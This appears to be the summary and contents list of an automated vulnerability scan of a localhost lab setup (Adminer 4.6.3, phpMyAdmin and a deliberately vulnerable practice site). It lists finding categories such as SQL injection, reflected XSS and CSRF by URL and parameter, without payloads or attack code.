Sample Report

Summary

The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that was used to identify the issue.

    Severity       Confidence
                   Certain   Firm   Tentative   Total
    High           4         25     0           29
    Medium         0         2      0           2
    Low            4         6      3           13
    Information    390       8      8           406

The chart below shows the aggregated numbers of issues identified in each category. Solid colored bars represent issues with a confidence level of Certain, and the bars fade as the confidence level falls.

[Chart: number of issues (axis 0 to 30) by severity: High, Medium, Low]

Contents

1. SQL injection

1.1. http://localhost/adminer [Referer HTTP header]

1.2. http://localhost/adminer [User-Agent HTTP header]

1.3. http://localhost/adminer [name of an arbitrarily supplied URL parameter]

1.4. http://localhost/adminer/ [Referer HTTP header]

1.5. http://localhost/adminer/ [User-Agent HTTP header]

1.6. http://localhost/adminer/ [name of an arbitrarily supplied URL parameter]

1.7. http://localhost/adminer/adminer-4.6.3.php [Referer HTTP header]

1.8. http://localhost/adminer/adminer-4.6.3.php [User-Agent HTTP header]

1.9. http://localhost/adminer/adminer-4.6.3.php [adminer_key cookie]

1.10. http://localhost/adminer/adminer-4.6.3.php [adminer_lang cookie]

1.11. http://localhost/adminer/adminer-4.6.3.php [adminer_permanent cookie]

1.12. http://localhost/adminer/adminer-4.6.3.php [adminer_sid cookie]

1.13. http://localhost/adminer/adminer-4.6.3.php [auth%5bdb%5d parameter]

1.14. http://localhost/adminer/adminer-4.6.3.php [auth%5bdriver%5d parameter]

1.15. http://localhost/adminer/adminer-4.6.3.php [auth%5bpassword%5d parameter]

1.16. http://localhost/adminer/adminer-4.6.3.php [auth%5bpermanent%5d parameter]

1.17. http://localhost/adminer/adminer-4.6.3.php [auth%5bserver%5d parameter]

1.18. http://localhost/adminer/adminer-4.6.3.php [auth%5busername%5d parameter]

1.19. http://localhost/adminer/adminer-4.6.3.php [db parameter]

1.20. http://localhost/adminer/adminer-4.6.3.php [lang parameter]

1.21. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied URL parameter]

1.22. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied body parameter]

1.23. http://localhost/adminer/adminer-4.6.3.php [server parameter]

1.24. http://localhost/adminer/adminer-4.6.3.php [token parameter]

1.25. http://localhost/adminer/adminer-4.6.3.php [username parameter]

2. Cross-site scripting (reflected)

2.1. http://localhost/ [lang parameter]

2.2. http://localhost/add_vhost.php [lang parameter]

3. Cleartext submission of password

3.1. http://localhost/

3.2. http://localhost/examplewebiste/vulnerabilities/csrf/

4. Session token in URL

4.1. http://localhost/phpmyadmin/index.php

4.2. http://localhost/phpmyadmin/index.php

5. Client-side JSON injection (DOM-based)

5.1. http://localhost/phpmyadmin/js/vendor/js.cookie.js

5.2. http://localhost/phpmyadmin/js/vendor/js.cookie.js

6. Password submitted using GET method

6.1. http://localhost/examplewebiste/vulnerabilities/brute/

6.2. http://localhost/examplewebiste/vulnerabilities/csrf/

7. Open redirection (DOM-based)

8. Open redirection (reflected DOM-based)

9. Password field with autocomplete enabled

10. Link manipulation (DOM-based)

10.1. http://localhost/phpmyadmin/doc/html/search.html

10.2. http://localhost/phpmyadmin/doc/html/search.html

11. Client-side HTTP parameter pollution (reflected)

11.1. http://localhost/ [lang parameter]

11.2. http://localhost/add_vhost.php [lang parameter]

12. Source code disclosure

13. Unencrypted communications

14. Path-relative style sheet import

14.1. http://localhost/

14.2. http://localhost/examplewebiste/

14.3. http://localhost/examplewebiste/about

14.4. http://localhost/examplewebiste/instructions

14.5. http://localhost/examplewebiste/vulnerabilities/brute/

14.6. http://localhost/phpsysinfo/index.php

15. Cross-site request forgery

15.1. http://localhost/add_vhost.php

15.2. http://localhost/phpmyadmin/index.php

16. Referer-dependent response

17. Spoofable client IP address

18. User agent-dependent response

19. Input returned in response (reflected)

19.1. http://localhost/ [Referer HTTP header]

19.2. http://localhost/ [User-Agent HTTP header]

19.3. http://localhost/ [lang parameter]

19.4. http://localhost/ [name of an arbitrarily supplied URL parameter]

19.5. http://localhost/ [phpinfo parameter]

19.6. http://localhost/add_vhost [URL path filename]

19.7. http://localhost/add_vhost.php [URL path filename]

19.8. http://localhost/add_vhost.php [lang parameter]

19.9. http://localhost/add_vhost.php [name of an arbitrarily supplied URL parameter]

19.10. http://localhost/adminer [URL path filename]

19.11. http://localhost/adminer/ [URL path folder 1]

19.12. http://localhost/adminer/adminer-4.6.3.php [URL path filename]

19.13. http://localhost/adminer/adminer-4.6.3.php [URL path folder 1]

19.14. http://localhost/adminer/adminer-4.6.3.php [adminer_key cookie]

19.15. http://localhost/adminer/adminer-4.6.3.php [adminer_permanent cookie]

19.16. http://localhost/adminer/adminer-4.6.3.php [auth%5bdb%5d parameter]

19.17. http://localhost/adminer/adminer-4.6.3.php [auth%5bdriver%5d parameter]

19.18. http://localhost/adminer/adminer-4.6.3.php [auth%5bserver%5d parameter]

19.19. http://localhost/adminer/adminer-4.6.3.php [auth%5busername%5d parameter]

19.20. http://localhost/adminer/adminer-4.6.3.php [db parameter]

19.21. http://localhost/adminer/adminer-4.6.3.php [lang parameter]

19.22. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied URL parameter]

19.23. http://localhost/adminer/adminer-4.6.3.php [server parameter]

19.24. http://localhost/adminer/adminer-4.6.3.php [token parameter]

19.25. http://localhost/adminer/adminer-4.6.3.php [username parameter]

19.26. http://localhost/examplewebiste/ [URL path folder 1]

19.27. http://localhost/examplewebiste/about [URL path filename]

19.28. http://localhost/examplewebiste/about [URL path folder 1]

19.29. http://localhost/examplewebiste/config [URL path filename]

19.30. http://localhost/examplewebiste/config [URL path folder 1]

19.31. http://localhost/examplewebiste/config/ [URL path folder 1]

19.32. http://localhost/examplewebiste/config/ [URL path folder 2]

19.33. http://localhost/examplewebiste/config/config.inc [URL path filename]

19.34. http://localhost/examplewebiste/config/config.inc [URL path folder 1]

19.35. http://localhost/examplewebiste/config/config.inc [URL path folder 2]

19.36. http://localhost/examplewebiste/config/config.inc.php.bak [URL path filename]

19.37. http://localhost/examplewebiste/config/config.inc.php.bak [URL path folder 1]

19.38. http://localhost/examplewebiste/config/config.inc.php.bak [URL path folder 2]

19.39. http://localhost/examplewebiste/docs/ [URL path folder 1]

19.40. http://localhost/examplewebiste/docs/ [URL path folder 2]

19.41. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path filename]

19.42. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path folder 1]

19.43. http://localhost/examplewebiste/docs/examplewebiste_v1.3.pdf [URL path folder 2]

19.44. http://localhost/examplewebiste/docs/pdf [URL path filename]

19.45. http://localhost/examplewebiste/docs/pdf [URL path folder 1]

19.46. http://localhost/examplewebiste/docs/pdf [URL path folder 2]

19.47. http://localhost/examplewebiste/docs/pdf.html [URL path filename]

19.48. http://localhost/examplewebiste/docs/pdf.html [URL path folder 1]

19.49. http://localhost/examplewebiste/docs/pdf.html [URL path folder 2]

19.50. http://localhost/examplewebiste/examplewebiste [URL path filename]

19.51. http://localhost/examplewebiste/examplewebiste [URL path folder 1]

19.52. http://localhost/examplewebiste/examplewebiste/ [URL path folder 1]

19.53. http://localhost/examplewebiste/examplewebiste/ [URL path folder 2]

19.54. http://localhost/examplewebiste/examplewebiste/css [URL path filename]

19.55. http://localhost/examplewebiste/examplewebiste/css [URL path folder 1]

19.56. http://localhost/examplewebiste/examplewebiste/css [URL path folder 2]

19.57. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 1]

19.58. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 2]

19.59. http://localhost/examplewebiste/examplewebiste/css/ [URL path folder 3]

19.60. http://localhost/examplewebiste/examplewebiste/images [URL path filename]

19.61. http://localhost/examplewebiste/examplewebiste/images [URL path folder 1]

19.62. http://localhost/examplewebiste/examplewebiste/images [URL path folder 2]

19.63. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 1]

19.64. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 2]

19.65. http://localhost/examplewebiste/examplewebiste/images/ [URL path folder 3]

19.66. http://localhost/examplewebiste/examplewebiste/includes [URL path filename]

19.67. http://localhost/examplewebiste/examplewebiste/includes [URL path folder 1]

19.68. http://localhost/examplewebiste/examplewebiste/includes [URL path folder 2]

19.69. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 1]

19.70. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 2]

19.71. http://localhost/examplewebiste/examplewebiste/includes/ [URL path folder 3]

19.72. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 1]

19.73. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 2]

19.74. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 3]

19.75. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 4]

19.76. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path filename]

19.77. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 1]

19.78. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 2]

19.79. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 3]

19.80. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 4]

19.81. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path filename]

19.82. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 1]

19.83. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 2]

19.84. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 3]

19.85. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 4]

19.86. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path filename]

19.87. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 1]

19.88. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 2]

19.89. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 3]

19.90. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path filename]

19.91. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 1]

19.92. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 2]

19.93. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 3]

19.94. http://localhost/examplewebiste/examplewebiste/js [URL path filename]

19.95. http://localhost/examplewebiste/examplewebiste/js [URL path folder 1]

19.96. http://localhost/examplewebiste/examplewebiste/js [URL path folder 2]

19.97. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 1]

19.98. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 2]

19.99. http://localhost/examplewebiste/examplewebiste/js/ [URL path folder 3]

19.100. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path filename]

19.101. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 1]

19.102. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 2]

19.103. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners [URL path folder 3]

19.104. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path filename]

19.105. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 1]

19.106. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 2]

19.107. http://localhost/examplewebiste/examplewebiste/js/add_event_listeners.js [URL path folder 3]

19.108. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path filename]

19.109. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 1]

19.110. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 2]

19.111. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage [URL path folder 3]

19.112. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path filename]

19.113. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 1]

19.114. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 2]

19.115. http://localhost/examplewebiste/examplewebiste/js/examplewebistePage.js [URL path folder 3]

19.116. http://localhost/examplewebiste/instructions [URL path filename]

19.117. http://localhost/examplewebiste/instructions [URL path folder 1]

19.118. http://localhost/examplewebiste/vulnerabilities/ [URL path folder 2]

19.119. http://localhost/examplewebiste/vulnerabilities/brute/ [URL path folder 2]

19.120. http://localhost/examplewebiste/vulnerabilities/brute/ [URL path folder 3]

19.121. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 2]

19.122. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 3]

19.123. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 4]

19.124. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 2]

19.125. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 3]

19.126. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 4]

19.127. http://localhost/examplewebiste/vulnerabilities/captcha/ [URL path folder 2]

19.128. http://localhost/examplewebiste/vulnerabilities/captcha/ [URL path folder 3]

19.129. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 2]

19.130. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 3]

19.131. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 4]

19.132. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 2]

19.133. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 3]

19.134. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 4]

19.135. http://localhost/examplewebiste/vulnerabilities/csp/ [URL path folder 2]

19.136. http://localhost/examplewebiste/vulnerabilities/csp/ [URL path folder 3]

19.137. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 2]

19.138. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 3]

19.139. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 4]

19.140. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 2]

19.141. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 3]

19.142. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 4]

19.143. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path filename]

19.144. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 1]

19.145. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 2]

19.146. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 3]

19.147. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp [URL path folder 4]

19.148. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path filename]

19.149. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 1]

19.150. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 2]

19.151. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 3]

19.152. http://localhost/examplewebiste/vulnerabilities/csp/source/jsonp_impossible [URL path folder 4]

19.153. http://localhost/examplewebiste/vulnerabilities/csrf/ [URL path folder 2]

19.154. http://localhost/examplewebiste/vulnerabilities/csrf/ [URL path folder 3]

19.155. http://localhost/examplewebiste/vulnerabilities/exec/ [URL path folder 2]

19.156. http://localhost/examplewebiste/vulnerabilities/exec/ [URL path folder 3]

19.157. http://localhost/examplewebiste/vulnerabilities/fi/ [URL path folder 2]

19.158. http://localhost/examplewebiste/vulnerabilities/fi/ [URL path folder 3]

19.159. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 2]

19.160. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 3]

19.161. http://localhost/examplewebiste/vulnerabilities/fi/help/ [URL path folder 4]

19.162. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 2]

19.163. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 3]

19.164. http://localhost/examplewebiste/vulnerabilities/fi/source/ [URL path folder 4]

19.165. http://localhost/examplewebiste/vulnerabilities/javascript/ [URL path folder 2]

19.166. http://localhost/examplewebiste/vulnerabilities/javascript/ [URL path folder 3]

19.167. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 2]

19.168. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 3]

19.169. http://localhost/examplewebiste/vulnerabilities/javascript/help/ [URL path folder 4]

19.170. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 2]

19.171. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 3]

19.172. http://localhost/examplewebiste/vulnerabilities/javascript/source/ [URL path folder 4]

19.173. http://localhost/examplewebiste/vulnerabilities/sqli/ [URL path folder 2]

19.174. http://localhost/examplewebiste/vulnerabilities/sqli/ [URL path folder 3]

19.175. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 2]

19.176. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 3]

19.177. http://localhost/examplewebiste/vulnerabilities/sqli/help/ [URL path folder 4]

19.178. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 2]

19.179. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 3]

19.180. http://localhost/examplewebiste/vulnerabilities/sqli/source/ [URL path folder 4]

19.181. http://localhost/examplewebiste/vulnerabilities/sqli_blind/ [URL path folder 2]

19.182. http://localhost/examplewebiste/vulnerabilities/sqli_blind/ [URL path folder 3]

19.183. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 2]

19.184. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 3]

19.185. http://localhost/examplewebiste/vulnerabilities/sqli_blind/help/ [URL path folder 4]

19.186. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 2]

19.187. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 3]

19.188. http://localhost/examplewebiste/vulnerabilities/sqli_blind/source/ [URL path folder 4]

19.189. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path filename]

19.190. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path folder 1]

19.191. http://localhost/examplewebiste/vulnerabilities/view_help.php [URL path folder 2]

19.192. http://localhost/examplewebiste/vulnerabilities/view_help.php [name of an arbitrarily supplied URL parameter]

19.193. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path filename]

19.194. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path folder 1]

19.195. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path folder 2]

19.196. http://localhost/examplewebiste/vulnerabilities/view_source.php [name of an arbitrarily supplied URL parameter]

19.197. http://localhost/icons/small/ [URL path folder 2]

19.198. http://localhost/phpmyadmin/doc/ [URL path folder 2]

19.199. http://localhost/phpmyadmin/doc/html/search.html [URL path filename]

19.200. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 1]

19.201. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 2]

19.202. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 3]

19.203. http://localhost/phpmyadmin/index.php [URL path filename]

19.204. http://localhost/phpmyadmin/index.php [URL path folder 1]

19.205. http://localhost/phpmyadmin/index.php [db parameter]

19.206. http://localhost/phpmyadmin/index.php [name of an arbitrarily supplied URL parameter]

19.207. http://localhost/phpmyadmin/index.php [table parameter]

19.208. http://localhost/phpmyadmin/js/ [URL path folder 2]

19.209. http://localhost/phpmyadmin/js/ajax.js [URL path filename]

19.210. http://localhost/phpmyadmin/js/ajax.js [URL path folder 1]

19.211. http://localhost/phpmyadmin/js/ajax.js [URL path folder 2]

19.212. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path filename]

19.213. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 1]

19.214. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 2]

19.215. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 3]

19.216. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 4]

19.217. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path folder 5]

19.218. http://localhost/phpmyadmin/js/common.js [URL path filename]

19.219. http://localhost/phpmyadmin/js/common.js [URL path folder 1]

19.220. http://localhost/phpmyadmin/js/common.js [URL path folder 2]

19.221. http://localhost/phpmyadmin/js/config.js [URL path filename]

19.222. http://localhost/phpmyadmin/js/config.js [URL path folder 1]

19.223. http://localhost/phpmyadmin/js/config.js [URL path folder 2]

19.224. http://localhost/phpmyadmin/js/console.js [URL path filename]

19.225. http://localhost/phpmyadmin/js/console.js [URL path folder 1]

19.226. http://localhost/phpmyadmin/js/console.js [URL path folder 2]

19.227. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path filename]

19.228. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path folder 1]

19.229. http://localhost/phpmyadmin/js/cross_framing_protection.js [URL path folder 2]

19.230. http://localhost/phpmyadmin/js/doclinks.js [URL path filename]

19.231. http://localhost/phpmyadmin/js/doclinks.js [URL path folder 1]

19.232. http://localhost/phpmyadmin/js/doclinks.js [URL path folder 2]

19.233. http://localhost/phpmyadmin/js/error_report.js [URL path filename]

19.234. http://localhost/phpmyadmin/js/error_report.js [URL path folder 1]

19.235. http://localhost/phpmyadmin/js/error_report.js [URL path folder 2]

19.236. http://localhost/phpmyadmin/js/functions.js [URL path filename]

19.237. http://localhost/phpmyadmin/js/functions.js [URL path folder 1]

19.238. http://localhost/phpmyadmin/js/functions.js [URL path folder 2]

19.239. http://localhost/phpmyadmin/js/indexes.js [URL path filename]

19.240. http://localhost/phpmyadmin/js/indexes.js [URL path folder 1]

19.241. http://localhost/phpmyadmin/js/indexes.js [URL path folder 2]

19.242. http://localhost/phpmyadmin/js/keyhandler.js [URL path filename]

19.243. http://localhost/phpmyadmin/js/keyhandler.js [URL path folder 1]

19.244. http://localhost/phpmyadmin/js/keyhandler.js [URL path folder 2]

19.245. http://localhost/phpmyadmin/js/menu-resizer.js [URL path filename]

19.246. http://localhost/phpmyadmin/js/menu-resizer.js [URL path folder 1]

19.247. http://localhost/phpmyadmin/js/menu-resizer.js [URL path folder 2]

19.248. http://localhost/phpmyadmin/js/messages.php [URL path filename]

19.249. http://localhost/phpmyadmin/js/messages.php [URL path folder 1]

19.250. http://localhost/phpmyadmin/js/messages.php [URL path folder 2]

19.251. http://localhost/phpmyadmin/js/messages.php [name of an arbitrarily supplied URL parameter]

19.252. http://localhost/phpmyadmin/js/navigation.js [URL path filename]

19.253. http://localhost/phpmyadmin/js/navigation.js [URL path folder 1]

19.254. http://localhost/phpmyadmin/js/navigation.js [URL path folder 2]

19.255. http://localhost/phpmyadmin/js/page_settings.js [URL path filename]

19.256. http://localhost/phpmyadmin/js/page_settings.js [URL path folder 1]

19.257. http://localhost/phpmyadmin/js/page_settings.js [URL path folder 2]

19.258. http://localhost/phpmyadmin/js/rte.js [URL path filename]

19.259. http://localhost/phpmyadmin/js/rte.js [URL path folder 1]

19.260. http://localhost/phpmyadmin/js/rte.js [URL path folder 2]

19.261. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path filename]

19.262. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path folder 1]

19.263. http://localhost/phpmyadmin/js/shortcuts_handler.js [URL path folder 2]

19.264. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path filename]

19.265. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 1]

19.266. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 2]

19.267. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 3]

19.268. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 4]

19.269. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 5]

19.270. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/show-hint.js [URL path folder 6]

19.271. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path filename]

19.272. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 1]

19.273. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 2]

19.274. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 3]

19.275. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 4]

19.276. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 5]

19.277. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 6]

19.278. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path filename]

19.279. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 1]

19.280. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 2]

19.281. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 3]

19.282. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 4]

19.283. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 5]

19.284. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 6]

19.285. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path filename]

19.286. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 1]

19.287. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 2]

19.288. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 3]

19.289. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 4]

19.290. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 5]

19.291. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 6]

19.292. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path filename]

19.293. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 1]

19.294. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 2]

19.295. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 3]

19.296. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 4]

19.297. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 5]

19.298. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path filename]

19.299. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 1]

19.300. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 2]

19.301. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 3]

19.302. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 4]

19.303. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 5]

19.304. http://localhost/phpmyadmin/js/vendor/codemirror/mode/sql/sql.js [URL path folder 6]

19.305. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path filename]

19.306. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path folder 1]

19.307. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path folder 2]

19.308. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path folder 3]

19.309. http://localhost/phpmyadmin/js/vendor/jquery/jquery-migrate.js [URL path folder 4]

19.310. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path filename]

19.311. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path folder 1]

19.312. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path folder 2]

19.313. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path folder 3]

19.314. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui-timepicker-addon.js [URL path folder 4]

19.315. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path filename]

19.316. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path folder 1]

19.317. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path folder 2]

19.318. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path folder 3]

19.319. http://localhost/phpmyadmin/js/vendor/jquery/jquery-ui.min.js [URL path folder 4]

19.320. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path filename]

19.321. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path folder 1]

19.322. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path folder 2]

19.323. http://localhost/phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js [URL path folder 3]

